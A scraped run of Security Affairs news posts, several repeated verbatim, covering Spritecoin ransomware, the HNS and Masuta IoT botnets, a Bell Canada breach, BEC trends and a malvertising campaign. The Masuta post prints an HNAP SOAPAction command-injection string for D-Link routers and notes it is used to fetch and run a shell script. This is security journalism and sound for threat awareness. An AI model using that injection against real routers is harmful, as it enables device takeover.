Researchers from Fortinet FortiGuard Labs has discovered a strain of ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

The ransomware poses itself as a “spritecoin” wallet, it asks users to create their desired password, but instead of downloading the block-chain it encrypts the victim’s data files.

The malware asks for a 0.3 Monero ransom ($105 USD at the time of writing) and drops on the target system a ransom note of “Your files are encrypted.”

SpriteCoin ransomware

The malware includes an embedded SQLite engine, a circumstance that leads experts to believe it also implements a credentials harvesting feature for Chrome and Firefox credential store. The malicious code appends the .encrypted file extension to encrypted files (i.e. resume.doc.encrypted).

While decrypting the files, the Spritecoin ransomware also deploys another piece of malware that is able to harvest certificates, parse images, and control the web camera.

“In a cruel twist, if the victim decides to pay and obtain a decryption key they are then delivered a new malicious executable [80685e4eb850f8c5387d1682b618927105673fe3a2692b5c1ca9c66fb62b386b], detected as W32/Generic!tr.” reads the report.

“While have not yet fully analyzed this malicious payload, we can verify that it does have the capability to activate web cameras and parse certificates and keys that will likely leave the victim more compromised than before.”

The experts speculate the ransomware is being spread via forum spam that targets users interested in cryptocurrency.

“Ransomware is usually delivered via social engineering techniques, but can also be delivered without user interaction via exploits. These often arrive (but are not limited to) via email, exploit kits, malicious crafted Excel/Word/PDF macros, or JavaScript downloaders.” states the analysis published by Fortinet.

“The attacker often uses social engineering and carefully crafted malicious emails to trick and entice the victim to run these executables. These files are often seen using compelling file names to lure the victim into opening the file. Usually, the ransomware requires some user interaction to successfully compromise the victim’s machine.”

In this case, the threat arrives as a “SpriteCoin” package (spritecoind[.]exe) under the guise of a SpriteCoin crypto-currency wallet.”

Once installed on the victim’s machine, the malware will present a user with a prompt to “Enter your desired wallet password.”

SpriteCoin ransomware

When the victims provide their credentials the Spritecoin ransomware inform users it is downloading the blockchain, while it is actually encrypting the files.

The ransomware connects to a TOR site via an Onion proxy (http://jmqapf3nflatei35[.]onion.link/*) that allows the victim to communicate with the attacker’s website without the need for a TOR connection.

Further details, including IoCs are included in the report.

Pierluigi Paganini

(Security Affairs – Spritecoin ransomware, Monero)

 

The post Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data appeared first on Security Affairs.

New HNS botnet has already compromised more than 20,000 IoT devices

A new botnet called Hide ‘N Seek (HNS botnet) appeared in the threat landscape, the malware is rapidly spreading infecting unsecured IoT devices, mainly IP cameras.

The HNS botnet was first spotted on January 10th by malware researchers from Bitdefender, then it disappeared for a few days, and it has risen over the weekend.

The number of infected systems grew up from 12 at the time of the discovery up to over 20,000 bots, at the time of writing.

HNS botnet

“Bitdefender researchers have uncovered an emerging botnet that uses advanced communication techniques to exploit victims and build its infrastructure. The bot, dubbed HNS, was intercepted by our IoT honeypot system following a credentials dictionary attack on the Telnet service.” states the analysis from Bitdefender.

“The samples identified in our honeypots on Jan. 10 revolved around IP cameras manufactured by a Korean company. These devices seemed to play a major role in the botnet as, out of the 12 IP addresses hardcoded in the sample, 10 used to belong to Focus H&S devices. The new version, observed on Jan. 20, dropped the hardcoded IPs.”

Recently security experts spotted other IoT botnets, most of them linked to the Mirai botnet, such as Satori, Okiru, and Masuta, but the HNS botnet has a different genesis and doesn’t share the source code.

Researchers at Bitdefender found similarities between the HNS and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes and its modular structure allows operators to add new capabilities on the fly.

“It is the second known IoT botnet to date, after the notorious Hajime botnet, that has a decentralized, peer-to-peer architecture,” states Bitdefender. “However, if in the case of Hajime, the P2P functionality was based on the BitTorrent protocol, here we have a custom-built P2P communication mechanism.”

The HNS malware is able to infect a series of IoT devices using the exploit as Reaper, the current version is able to receive and execute several types of commands, such as data exfiltration, code execution and interference with a device’s operation.HNS botnet

According to the experts, the botnet is still under development, it doesn’t include DDoS capabilities, a circumstance that suggests it is intended to be deployed as a proxy network.

“While IoT botnets have been around for years, mainly used for DDoS attacks, the discoveries made during the investigation of the Hide and Seek bot reveal greater levels of complexity and novel capabilities such as information theft – potentially suitable for espionage or extortion.” concluded Bitdefender.

“It is also worth noting that the botnet is undergoing constant redesign and rapid expansion.”

The bot spread by randomly generates a list of IP addresses that could be potentially compromised. It then initiates a raw socket SYN connection to each potential target and continues communication with those devices that answer the request on specific destination ports (23 2323, 80, 8080).

Once the bot has established a connection it will look for a specific banner (“buildroot login:”) presented by the victim. If it gets this login banner, it attempts to log in using a list of default credentials. If the credentials are not correct, the botnet launches a dictionary attack using a hardcoded list.

Once connected to the victim, the malware will run through a “state machine” to determine the type of target device and select the most suitable compromise method. Experts explained that if the device shares the same network with the bot, the bot sets up TFTP server to allow the victim to download the malicious code from the bot. If the victim is located on the internet, the bot will attempt to use a specific remote payload delivery method to get the target device to download and execute the sample.

“These exploitation techniques are preconfigured and are located in a memory location that is digitally signed to prevent tampering. This list can be updated remotely and propagated among infected hosts.” continues the analysis.

Experts observed that the HNS botnet cannot establish persistence on infected devices, once the device restart, the malware will be removed, this means that botnet operators have to continuously manage the HNS botnet.

Let’s monitor the growth of the new-born botnet.

Pierluigi Paganini

(Security Affairs – HNS botnet, malware)

The post New HNS botnet has already compromised more than 20,000 IoT devices appeared first on Security Affairs.

Security Affairs: New HNS botnet has already compromised more than 20,000 IoT devices

A new botnet called Hide ‘N Seek (HNS botnet) appeared in the threat landscape, the malware is rapidly spreading infecting unsecured IoT devices, mainly IP cameras.

The HNS botnet was first spotted on January 10th by malware researchers from Bitdefender, then it disappeared for a few days, and it has risen over the weekend.

The number of infected systems grew up from 12 at the time of the discovery up to over 20,000 bots, at the time of writing.

HNS botnet

“Bitdefender researchers have uncovered an emerging botnet that uses advanced communication techniques to exploit victims and build its infrastructure. The bot, dubbed HNS, was intercepted by our IoT honeypot system following a credentials dictionary attack on the Telnet service.” states the analysis from Bitdefender.

“The samples identified in our honeypots on Jan. 10 revolved around IP cameras manufactured by a Korean company. These devices seemed to play a major role in the botnet as, out of the 12 IP addresses hardcoded in the sample, 10 used to belong to Focus H&S devices. The new version, observed on Jan. 20, dropped the hardcoded IPs.”

Recently security experts spotted other IoT botnets, most of them linked to the Mirai botnet, such as Satori, Okiru, and Masuta, but the HNS botnet has a different genesis and doesn’t share the source code.

Researchers at Bitdefender found similarities between the HNS and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes and its modular structure allows operators to add new capabilities on the fly.

“It is the second known IoT botnet to date, after the notorious Hajime botnet, that has a decentralized, peer-to-peer architecture,” states Bitdefender. “However, if in the case of Hajime, the P2P functionality was based on the BitTorrent protocol, here we have a custom-built P2P communication mechanism.”

The HNS malware is able to infect a series of IoT devices using the exploit as Reaper, the current version is able to receive and execute several types of commands, such as data exfiltration, code execution and interference with a device’s operation.HNS botnet

According to the experts, the botnet is still under development, it doesn’t include DDoS capabilities, a circumstance that suggests it is intended to be deployed as a proxy network.

“While IoT botnets have been around for years, mainly used for DDoS attacks, the discoveries made during the investigation of the Hide and Seek bot reveal greater levels of complexity and novel capabilities such as information theft – potentially suitable for espionage or extortion.” concluded Bitdefender.

“It is also worth noting that the botnet is undergoing constant redesign and rapid expansion.”

The bot spread by randomly generates a list of IP addresses that could be potentially compromised. It then initiates a raw socket SYN connection to each potential target and continues communication with those devices that answer the request on specific destination ports (23 2323, 80, 8080).

Once the bot has established a connection it will look for a specific banner (“buildroot login:”) presented by the victim. If it gets this login banner, it attempts to log in using a list of default credentials. If the credentials are not correct, the botnet launches a dictionary attack using a hardcoded list.

Once connected to the victim, the malware will run through a “state machine” to determine the type of target device and select the most suitable compromise method. Experts explained that if the device shares the same network with the bot, the bot sets up TFTP server to allow the victim to download the malicious code from the bot. If the victim is located on the internet, the bot will attempt to use a specific remote payload delivery method to get the target device to download and execute the sample.

“These exploitation techniques are preconfigured and are located in a memory location that is digitally signed to prevent tampering. This list can be updated remotely and propagated among infected hosts.” continues the analysis.

Experts observed that the HNS botnet cannot establish persistence on infected devices, once the device restart, the malware will be removed, this means that botnet operators have to continuously manage the HNS botnet.

Let’s monitor the growth of the new-born botnet.

Pierluigi Paganini

(Security Affairs – HNS botnet, malware)

The post New HNS botnet has already compromised more than 20,000 IoT devices appeared first on Security Affairs.



Security Affairs

Cybersecurity: What Does the Board Want and Need?

There should be little doubt about the importance of cybersecurity these days, given the amount of attention the topic has garnered. The attack surface is growing as a result of

The post Cybersecurity: What Does the Board Want and Need? appeared first on The Cyber Security Place.

Security Affairs: Bell Canada suffers a data breach for the second time in less than a year

Bell Canada is notifying customers about a data breach that exposed personal data of roughly 100,000 individuals, this is the second security breach in a few months.

Bell Canada is notifying customers about a data breach that exposed personal data of roughly 100,000 individuals, including names, phone numbers, email addresses, usernames and account numbers.

“The protection of consumer and corporate information is of primary importance to Bell,” John Watson, Executive Vice-President of Customer Experience at Bell Canada, told customers. “We work closely with the RCMP and other law enforcement agencies, government bodies and the broader technology industry to combat the growth of cyber crimes.”

The Royal Canadian Mounted Police has launched an investigation into the security breach at Bell Canada.

“We are following up with Bell to obtain information regarding what took place and what they are doing to mitigate the situation, and to determine follow up actions,” said the federal privacy watchdog’s spokeswoman Tobi Cohen.  

Bell company added that there is no evidence that financial data (i.e. credit card data) has been compromised.

Bell Canada

This the second time that Bell Canada has been a victim of a data breach, in May 2017 an anonymous hacker obtained access to about 1.9 million active email addresses and about 1,700 customer names and active phone numbers.

As part of the incident response procedure, Bell confirmed to have implemented additional security measures, for accounts’ authentication.

Bell Canada advised users to monitor their financial and online accounts for unauthorized activity and recommends customers to use strong passwords and frequently change them.

The Canadian Government plans to review the Personal Information Protection and Electronic Documents Act that would require companies to notify data breaches.

Unfortunately, until now only the province Alberta has mandatory reporting requirements for private-sector companies that suffer a data breach.

Pierluigi Paganini

(Security Affairs – Bell Canada, data breach)

The post Bell Canada suffers a data breach for the second time in less than a year appeared first on Security Affairs.



Security Affairs

Bell Canada suffers a data breach for the second time in less than a year

Bell Canada is notifying customers about a data breach that exposed personal data of roughly 100,000 individuals, this is the second security breach in a few months.

Bell Canada is notifying customers about a data breach that exposed personal data of roughly 100,000 individuals, including names, phone numbers, email addresses, usernames and account numbers.

“The protection of consumer and corporate information is of primary importance to Bell,” John Watson, Executive Vice-President of Customer Experience at Bell Canada, told customers. “We work closely with the RCMP and other law enforcement agencies, government bodies and the broader technology industry to combat the growth of cyber crimes.”

The Royal Canadian Mounted Police has launched an investigation into the security breach at Bell Canada.

“We are following up with Bell to obtain information regarding what took place and what they are doing to mitigate the situation, and to determine follow up actions,” said the federal privacy watchdog’s spokeswoman Tobi Cohen.  

Bell company added that there is no evidence that financial data (i.e. credit card data) has been compromised.

Bell Canada

This the second time that Bell Canada has been a victim of a data breach, in May 2017 an anonymous hacker obtained access to about 1.9 million active email addresses and about 1,700 customer names and active phone numbers.

As part of the incident response procedure, Bell confirmed to have implemented additional security measures, for accounts’ authentication.

Bell Canada advised users to monitor their financial and online accounts for unauthorized activity and recommends customers to use strong passwords and frequently change them.

The Canadian Government plans to review the Personal Information Protection and Electronic Documents Act that would require companies to notify data breaches.

Unfortunately, until now only the province Alberta has mandatory reporting requirements for private-sector companies that suffer a data breach.

Pierluigi Paganini

(Security Affairs – Bell Canada, data breach)

The post Bell Canada suffers a data breach for the second time in less than a year appeared first on Security Affairs.

Satori’s threat actors are behind the new Masuta botnet that is targeting routers in the wild

Masuta botnet targets routers using default credentials, one of the versions analyzed dubbed “PureMasuta” relies on the old network administration EDB 38722 D-Link exploit.

Security experts at NewSky’s believe the operators of the recently discovered Satori botnet are launching a new massive hacking campaign against routers to recruit infect them and recruit in the botnet dubbed Masuta.

“We analyzed two variants of an IoT botnet named “Masuta” where we observed the involvement of a well-known IoT threat actor and discovered a router exploit being weaponized for the first time in a botnet campaign.” reads the analysis published by NewSky.

“We were able to get hands on the source code of Masuta (Japanese for “master”) botnet in an invite only dark forum. After analyzing the configuration file., we saw that Masuta uses 0xdedeffba instead of Mirai’s 0xdeadbeef as the seed of the cipher key, hence the strings in the configuration files were effectively xored by ((DE^DE)^FF) ^BA or 0x45.”

The Satori botnet is a variant of the Mirai botnet first discovered by the group of experts MalwareMustDie, it made the headlines at the end of 2016 when it was involved in hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

Masuta also targets routers using default credentials, one of the versions analyzed by the experts dubbed “PureMasuta” relies on the old network administration EDB 38722 D-Link exploit.

Researchers noticed a rise in the Masuta attacks since September, their honeypots observed 2400 IPs involved in the botnet in last three months and experts believe that other routers will be recruited in the next months.

Masuta-botnet.

The flaw triggered by the EDB 38722 D-Link exploit was discovered in 2015 by the researchers Craig Heffner, it affects the D-Link’s Home Network Administration Protocol.

“The weaponized bug introduced in PureMasuta botnet is in the HNAP (Home Network Administration Protocol) which itself is based on the SOAP protocol.” continues the analysis published by NewSky.

“It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.”

The experts explained that a string like the following one will cause a reboot.

SOAPAction: “hxxp://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`”

An attacker can run any command inserted after ‘GetDeviceSettings’, this mechanism is used by the PureMasuta bot to run a wget to fetch and run a shell script and take over the target router.

The experts noticed that the command and control server (93.174.93.63) used by PureMasuta variant is the same as used in the original Masuta variants, this means that PureMasuta is an evolution of the botnet operated by the same threat actors.

NewSky attributes the Masuta botnet to an entity dubbed “Nexus Zeta”, the name comes from the C&C URL nexusiotsolutions(dot)net, this URL is the same used by the Satori botnet.

Pierluigi Paganini

(Security Affairs – Masuta botnet, Satori botnet)

The post Satori’s threat actors are behind the new Masuta botnet that is targeting routers in the wild appeared first on Security Affairs.

Security Affairs: Satori’s threat actors are behind the new Masuta botnet that is targeting routers in the wild

Masuta botnet targets routers using default credentials, one of the versions analyzed dubbed “PureMasuta” relies on the old network administration EDB 38722 D-Link exploit.

Security experts at NewSky’s believe the operators of the recently discovered Satori botnet are launching a new massive hacking campaign against routers to recruit infect them and recruit in the botnet dubbed Masuta.

“We analyzed two variants of an IoT botnet named “Masuta” where we observed the involvement of a well-known IoT threat actor and discovered a router exploit being weaponized for the first time in a botnet campaign.” reads the analysis published by NewSky.

“We were able to get hands on the source code of Masuta (Japanese for “master”) botnet in an invite only dark forum. After analyzing the configuration file., we saw that Masuta uses 0xdedeffba instead of Mirai’s 0xdeadbeef as the seed of the cipher key, hence the strings in the configuration files were effectively xored by ((DE^DE)^FF) ^BA or 0x45.”

The Satori botnet is a variant of the Mirai botnet first discovered by the group of experts MalwareMustDie, it made the headlines at the end of 2016 when it was involved in hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

Masuta also targets routers using default credentials, one of the versions analyzed by the experts dubbed “PureMasuta” relies on the old network administration EDB 38722 D-Link exploit.

Researchers noticed a rise in the Masuta attacks since September, their honeypots observed 2400 IPs involved in the botnet in last three months and experts believe that other routers will be recruited in the next months.

Masuta-botnet.

The flaw triggered by the EDB 38722 D-Link exploit was discovered in 2015 by the researchers Craig Heffner, it affects the D-Link’s Home Network Administration Protocol.

“The weaponized bug introduced in PureMasuta botnet is in the HNAP (Home Network Administration Protocol) which itself is based on the SOAP protocol.” continues the analysis published by NewSky.

“It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.”

The experts explained that a string like the following one will cause a reboot.

SOAPAction: “hxxp://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`”

An attacker can run any command inserted after ‘GetDeviceSettings’, this mechanism is used by the PureMasuta bot to run a wget to fetch and run a shell script and take over the target router.

The experts noticed that the command and control server (93.174.93.63) used by PureMasuta variant is the same as used in the original Masuta variants, this means that PureMasuta is an evolution of the botnet operated by the same threat actors.

NewSky attributes the Masuta botnet to an entity dubbed “Nexus Zeta”, the name comes from the C&C URL nexusiotsolutions(dot)net, this URL is the same used by the Satori botnet.

Pierluigi Paganini

(Security Affairs – Masuta botnet, Satori botnet)

The post Satori’s threat actors are behind the new Masuta botnet that is targeting routers in the wild appeared first on Security Affairs.



Security Affairs

According to TrendMicro Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018

According to a report published by the security firm TrendMicro, Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018.

The report highlights the growth of damage caused by hackers who adopts new attack vectors techniques like the ones used recently by Lebanese intelligence agency Dark Caracal

According to a report published by TrendMicro, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018. This rising value of loss for business takes into account new attack vectors like the one from Lebanese Intelligence Agency Dark Caracal malware who utilizes malware in android application.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $ 5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing Social Engineering to lure and deceive employees in a myriad of scams to bypass security measures. By using a deep understanding of Human Psychology hackers are circumventing the defenses, as the report states ” it requires little in the way of special tools or technical knowledge to pull off, instead of requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: Bogus invoice scheme, CEO fraud, Account compromise, Attorney impersonation and Data Theft. The report highlight that these attacks can be classified into two major groups: Credential grabbing and email only.

Business Email Compromise

The credential grabbing technique as detailed by the report has shown an increase in phishing HTML pages that are sent as spam attachments. Also, by employing malware campaign hackers target organizations. One recent example of malware is Zyklon that exploits flaws in Microsoft Office. The charts in the report shown that the attacks have doubled in the period from January to September 2017.

As discovered by researchers in the report, the two main types of malware techniques employed are keyloggers and Remote Access Tools (RAT). Since these tools are low cost and effective they can harvest all credentials on any infected machines. Malware techniques are very hard to detect by anti-virus since they are widely shared in forums or placed in applications commonly used on a daily basis. The report lists the most common malware used in Business Email Compromise attacks: AgentTesla, CyborgLogger, DarkComet, DiamondFox, Dracula Logger, iSpy Keylooger, Knight Logger and Luminosity Link.

The report also suggests how to defend and avoid against BEC attacks: Employee awareness and education, verifying emails received, verification of the legitimacy of executive requests, verification of requests from vendors and suppliers, verification of any requests and the adoption of a security culture within the organization.

Sources:

https://www.ic3.gov/media/2017/170504.aspx

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/business-email-compromise-bec-schemes

https://www.trendmicro.com/vinfo/us/security/research-and-analysis/predictions/2018

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/delving-into-the-world-of-business-email-compromise-bec

https://irishinfosecnews.wordpress.com/2018/01/18/bec-attacks-to-exceed-9b-in-2018-trend-micro/

https://www.infosecurity-magazine.com/news/new-attack-group-fires-rats-and/

https://threatpost.com/new-dridex-variant-emerges-with-an-ftp-twist/129546/

http://mashable.com/2018/01/19/dark-caracal-hackers-phish-whatsapp-and-facebook-accounts/#1p4UuGZVVSqx

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/delving-into-the-world-of-business-email-compromise-bec

https://www.darkreading.com/vulnerabilities—threats/bec-attacks-to-exceed-$9b-in-2018-trend-micro/d/d-id/1330853

https://www.csoonline.com/article/3247670/email/email-security-in-2018.html

http://www.informationsecuritybuzz.com/expert-comments/business-email-compromise-attacks-exceed-9b-2018-ironscales/

https://in.reuters.com/article/us-lebanon-cyber/lebanese-security-agency-turns-smartphone-into-selfie-spycam-researchers-idINKBN1F726S

https://www.forbes.com/sites/thomasbrewster/2018/01/18/lebanon-surveillance-hits-google-android-lookout-eff/#19ad8aef7971

http://www.computerweekly.com/news/252433527/Powerful-Zyklon-malware-exploiting-MS-Office-flaws

About the author Luis Nakamoto

Luis Nakamoto is a Computer Science student of Cryptology and a enthusiastic of information security having participated in groups like Comissão Especial de Direito Digital e Compliance (OAB/SP) and CCBS (Consciência Cibernética Brasil) as a researcher in new technologies related to ethical hacking, forensics and reverse engineering. Also a prolific and compulsive writer participating as a Redactor to Portal Tic from Sebrae Nacional.

Pierluigi Paganini

(Security Affairs – Business Email Compromise, cybercrime)

The post According to TrendMicro Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018 appeared first on Security Affairs.

Security Affairs: According to TrendMicro Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018

According to a report published by the security firm TrendMicro, Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018.

The report highlights the growth of damage caused by hackers who adopts new attack vectors techniques like the ones used recently by Lebanese intelligence agency Dark Caracal

According to a report published by TrendMicro, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018. This rising value of loss for business takes into account new attack vectors like the one from Lebanese Intelligence Agency Dark Caracal malware who utilizes malware in android application.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $ 5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing Social Engineering to lure and deceive employees in a myriad of scams to bypass security measures. By using a deep understanding of Human Psychology hackers are circumventing the defenses, as the report states ” it requires little in the way of special tools or technical knowledge to pull off, instead of requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: Bogus invoice scheme, CEO fraud, Account compromise, Attorney impersonation and Data Theft. The report highlight that these attacks can be classified into two major groups: Credential grabbing and email only.

Business Email Compromise

The credential grabbing technique as detailed by the report has shown an increase in phishing HTML pages that are sent as spam attachments. Also, by employing malware campaign hackers target organizations. One recent example of malware is Zyklon that exploits flaws in Microsoft Office. The charts in the report shown that the attacks have doubled in the period from January to September 2017.

As discovered by researchers in the report, the two main types of malware techniques employed are keyloggers and Remote Access Tools (RAT). Since these tools are low cost and effective they can harvest all credentials on any infected machines. Malware techniques are very hard to detect by anti-virus since they are widely shared in forums or placed in applications commonly used on a daily basis. The report lists the most common malware used in Business Email Compromise attacks: AgentTesla, CyborgLogger, DarkComet, DiamondFox, Dracula Logger, iSpy Keylooger, Knight Logger and Luminosity Link.

The report also suggests how to defend and avoid against BEC attacks: Employee awareness and education, verifying emails received, verification of the legitimacy of executive requests, verification of requests from vendors and suppliers, verification of any requests and the adoption of a security culture within the organization.

Sources:

https://www.ic3.gov/media/2017/170504.aspx

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/business-email-compromise-bec-schemes

https://www.trendmicro.com/vinfo/us/security/research-and-analysis/predictions/2018

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/delving-into-the-world-of-business-email-compromise-bec

https://irishinfosecnews.wordpress.com/2018/01/18/bec-attacks-to-exceed-9b-in-2018-trend-micro/

https://www.infosecurity-magazine.com/news/new-attack-group-fires-rats-and/

https://threatpost.com/new-dridex-variant-emerges-with-an-ftp-twist/129546/

http://mashable.com/2018/01/19/dark-caracal-hackers-phish-whatsapp-and-facebook-accounts/#1p4UuGZVVSqx

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/delving-into-the-world-of-business-email-compromise-bec

https://www.darkreading.com/vulnerabilities—threats/bec-attacks-to-exceed-$9b-in-2018-trend-micro/d/d-id/1330853

https://www.csoonline.com/article/3247670/email/email-security-in-2018.html

http://www.informationsecuritybuzz.com/expert-comments/business-email-compromise-attacks-exceed-9b-2018-ironscales/

https://in.reuters.com/article/us-lebanon-cyber/lebanese-security-agency-turns-smartphone-into-selfie-spycam-researchers-idINKBN1F726S

https://www.forbes.com/sites/thomasbrewster/2018/01/18/lebanon-surveillance-hits-google-android-lookout-eff/#19ad8aef7971

http://www.computerweekly.com/news/252433527/Powerful-Zyklon-malware-exploiting-MS-Office-flaws

About the author Luis Nakamoto

Luis Nakamoto is a Computer Science student of Cryptology and a enthusiastic of information security having participated in groups like Comissão Especial de Direito Digital e Compliance (OAB/SP) and CCBS (Consciência Cibernética Brasil) as a researcher in new technologies related to ethical hacking, forensics and reverse engineering. Also a prolific and compulsive writer participating as a Redactor to Portal Tic from Sebrae Nacional.

Pierluigi Paganini

(Security Affairs – Business Email Compromise, cybercrime)

The post According to TrendMicro Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018 appeared first on Security Affairs.



Security Affairs

Is 2018 the year cybercrime becomes mainstream?

The issue of cybercrime was thrust into international conversation last year, but what will the phenomenon look like in 2018?Cryptocurrencies will continue to be a driver for cybercrime. This is

The post Is 2018 the year cybercrime becomes mainstream? appeared first on The Cyber Security Place.

CSE CybSec ZLAB Malware Analysis Report – Exclusive, tens of thousands of compromised sites involved in a new massive malvertising campaign

Malware experts at CSE Cybsec uncovered a massive malvertising campaign leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.

In the last days of 2017, researchers at CSE Cybsec observed threat actors exploiting some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.

The compromised websites run various versions of the popular WordPress CMS. Once a website has been compromised, attackers will upload a “zip” file containing all the malicious files. Despite the “zip” file has different name for each infection, when it is uncompressed, the files contained in it have always the same structure. We have found some of these archives not used yet, so we analyzed their content.

The malicious files are inserted under a path referring probably different versions of the same malware (“vomiu”, “blsnxw”, “yrpowe”, “hkfoeyw”, “aqkei”, “xbiret”, “slvkty”).

Under this folder there are:

  • a php file, called “lerbim.php”;
  • a php file, that has the same name of the parent dir; it has initially “.suspected” extension and only in a second time, using “lerbim.php” file, it would be changed in “.php” file;
  • two directories, called “wtuds” and “sotpie”, containing a series of files.

An example of this structure is shown in the following figure:

The main purpose of the “malware” is to trigger a redirecting chain through at least two servers which generate advertising traffic.

The file “{malw_name}.php” becomes the core of all this context: if it is contacted by the user through the web browser, it redirects the flow first to “caforyn.pw” and then to “hitcpm.com”, which acts as a dispatcher to different sites registered to this revenue chain.

 

These sites could be used by attackers to offer commercial services that aim to increase traffic for their customers, but this traffic is generated in an illegal way by compromising websites. The sites could host also fraudulent pages which pretend to download suspicious stuff (i.e. Toolbars, browser extensions or fake antivirus) or steal sensitive data (i.e. credit card information).

In order to increase the visibility of the web, the compromised sites must have a good page-rank on search engines. So, the malware performs SEO Poisoning by leveraging on wordlist containing the trending searched words

The population of the compromised site with the wordlists and their relative query results is triggered contacting the main PHP using a specific User-Agent on a path “{malw_name}/{malw_name}.php?vm={keyword}”.

Researchers from CSE CybSec ZLab discovered roughly 18.100 compromised websites.

While researchers were analyzing the malvertising campaign, they realized that most of the compromised websites used in the first weeks of the attacks have been cleaned up in the last days.  just in one week, the number of compromised websites dropped from around 35k to 18k.

According to Alexa Traffic Rank, hitcpm.com is ranked number 132 in the world and 0.2367% of global Internet users visit it. Below are reported some traffic statistics related to hitcpm.com provided by hypestat.com

Daily Unique Visitors 1,183,500
Monthly Unique Visitors 35,505,000
Pages per visit 1.41
Daily Pageviews 1,668,735

The analysis of the traffic shows an exponential increase in the traffic during October 2017.

Experts discovered that crooks used a malicious software to hijack traffic, it acts as brows a browser hijacker. The malware is distributed via various methods, such as:

  • Attachment of junk mail
  • Downloading freeware program via unreliable site
  • Open torrent files and click on malicious links
  • By playing online games
  • By visiting compromised websites

The main purpose of the malware is to hijack web browsers changing browser settings such as DNS, settings, homepage etc. in order to redirect as more traffic as possible to the dispatcher site.

Further technical details about this campaign, including IoCs, are available in the report titled:

Tens of thousands of compromised web sites involved in new massive malvertising campaign

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180121_CSE_Massive_Malvertising_Report.pdf

Pierluigi Paganini

(Security Affairs – malvertising campaign, malware)

The post CSE CybSec ZLAB Malware Analysis Report – Exclusive, tens of thousands of compromised sites involved in a new massive malvertising campaign appeared first on Security Affairs.

Security Affairs: CSE CybSec ZLAB Malware Analysis Report – Exclusive, tens of thousands of compromised sites involved in a new massive malvertising campaign

Malware experts at CSE Cybsec uncovered a massive malvertising campaign leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.

In the last days of 2017, researchers at CSE Cybsec observed threat actors exploiting some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.

The compromised websites run various versions of the popular WordPress CMS. Once a website has been compromised, attackers will upload a “zip” file containing all the malicious files. Despite the “zip” file has different name for each infection, when it is uncompressed, the files contained in it have always the same structure. We have found some of these archives not used yet, so we analyzed their content.

The malicious files are inserted under a path referring probably different versions of the same malware (“vomiu”, “blsnxw”, “yrpowe”, “hkfoeyw”, “aqkei”, “xbiret”, “slvkty”).

Under this folder there are:

  • a php file, called “lerbim.php”;
  • a php file, that has the same name of the parent dir; it has initially “.suspected” extension and only in a second time, using “lerbim.php” file, it would be changed in “.php” file;
  • two directories, called “wtuds” and “sotpie”, containing a series of files.

An example of this structure is shown in the following figure:

The main purpose of the “malware” is to trigger a redirecting chain through at least two servers which generate advertising traffic.

The file “{malw_name}.php” becomes the core of all this context: if it is contacted by the user through the web browser, it redirects the flow first to “caforyn.pw” and then to “hitcpm.com”, which acts as a dispatcher to different sites registered to this revenue chain.

 

These sites could be used by attackers to offer commercial services that aim to increase traffic for their customers, but this traffic is generated in an illegal way by compromising websites. The sites could host also fraudulent pages which pretend to download suspicious stuff (i.e. Toolbars, browser extensions or fake antivirus) or steal sensitive data (i.e. credit card information).

In order to increase the visibility of the web, the compromised sites must have a good page-rank on search engines. So, the malware performs SEO Poisoning by leveraging on wordlist containing the trending searched words

The population of the compromised site with the wordlists and their relative query results is triggered contacting the main PHP using a specific User-Agent on a path “{malw_name}/{malw_name}.php?vm={keyword}”.

Researchers from CSE CybSec ZLab discovered roughly 18.100 compromised websites.

